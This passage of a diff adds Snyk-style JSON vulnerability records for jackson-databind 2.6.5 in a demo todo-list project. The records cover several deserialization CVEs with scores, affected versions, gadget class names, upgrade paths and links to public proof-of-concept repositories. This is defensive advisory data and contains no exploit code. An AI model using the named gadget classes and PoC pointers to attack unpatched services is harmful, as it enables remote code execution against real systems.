}, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": 
"https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + 
{ + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + 
], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + 
"filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + 
"className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model 
for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": 
